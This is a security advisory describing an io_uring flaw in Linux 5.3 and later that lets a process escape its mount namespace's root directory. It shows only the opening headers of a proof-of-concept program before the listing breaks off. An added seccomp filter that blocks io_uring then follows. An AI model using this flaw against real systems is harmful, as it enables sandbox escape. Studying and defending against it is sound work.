Linux 5.3 Insecure Root Path Handling

Linux versions 5.3 and above appear to have an issue where io_uring suffers from insecure handling of the root directory for path lookups.

MD5 | cd4620f1e39d2b19219c64ba6facc1f3

Linux >=5.3: io_uring: insecure handling of root directory for path lookups

When I saw
<https://lore.kernel.org/io-uring/[email protected]/T/>
today, I realized that this is not just a small correctness issue, but also has
some security implications on existing releases.

On 5.5, the incorrect handling of OPENAT means that not only the cwd, but also
the root directory is incorrect; here's a simple demonstration of how a process
inside a mount namespace can use that to gain access to the filesystem outside
the namespace:

===============================================================================
root@vm:~/uring# cat punted_open.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <err.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include "linux/io_uring.h"

#ifndef SYS_io_uring_enter
#define SYS_io_uring_enter 426
#endif
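For sandboxed workloads on kernels that still carry this bug, the practical defence is to keep io_uring out of reach entirely. The following seccomp-BPF filter is an added example written for this page, not code from the report above: it denies the three io_uring syscalls with EPERM and kills the process if it finds itself under a foreign ABI. It assumes an x86_64 host; the function names and the hard-coded syscall numbers (425-427 are uniform across architectures, and the report's own program falls back to 426 in the same way) are this example's own.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/prctl.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
/* io_uring syscall numbers; these are uniform across architectures (the
 * report's program likewise falls back to 426 for io_uring_enter). */
#define NR_IO_URING_SETUP    425
#define NR_IO_URING_ENTER    426
#define NR_IO_URING_REGISTER 427
#ifndef SECCOMP_RET_KILL_PROCESS
#define SECCOMP_RET_KILL_PROCESS 0x80000000U
#endif

/* Write the filter into prog (capacity cap) and return its instruction
 * count, or 0 if it does not fit. Assumes the x86_64 ABI (assumption). */
size_t build_io_uring_deny_filter(struct sock_filter *prog, size_t cap)
{
    const struct sock_filter f[] = {
        /* Kill rather than guess if the process runs under another ABI. */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
        /* Each of the three io_uring entry points fails with EPERM. */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, NR_IO_URING_SETUP, 2, 0),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, NR_IO_URING_ENTER, 1, 0),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, NR_IO_URING_REGISTER, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    size_t n = sizeof f / sizeof f[0];
    if (cap < n) return 0;
    for (size_t i = 0; i < n; i++) prog[i] = f[i];
    return n;
}

/* Install the filter for the calling process: 0 on success, -1 with errno
 * set. PR_SET_NO_NEW_PRIVS is what lets an unprivileged process install it. */
int install_io_uring_deny_filter(void)
{
    struct sock_filter insns[16];
    struct sock_fprog prog = { .len = 0, .filter = insns };
    prog.len = (unsigned short)build_io_uring_deny_filter(insns, 16);
    if (prog.len == 0 || prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == -1)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}
```

Call `install_io_uring_deny_filter()` before dropping into the sandboxed code; the filter is inherited across fork and execve, so every descendant gets EPERM from io_uring_setup() and never reaches the affected path-lookup code.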